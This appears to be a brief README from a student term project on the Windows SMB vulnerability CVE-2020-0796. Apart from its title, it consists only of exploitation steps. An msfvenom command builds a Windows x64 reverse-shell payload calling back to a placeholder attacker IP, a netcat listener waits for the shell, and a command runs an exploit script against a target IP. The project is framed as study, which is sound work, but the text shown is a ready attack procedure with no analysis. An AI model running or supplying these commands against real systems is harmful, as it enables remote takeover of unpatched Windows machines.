
CVE-2020-0796 explanation and researching vulnerability for term porject CENG325
CVE-2020-0796 explanation and researching vulnerability for term porject CENG325 for beginners
Userpayload generation for reverse shell:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
listening port:
nc -lvnp 5555
exploit code execution:
python3 exploit.py -ip TARGET_IP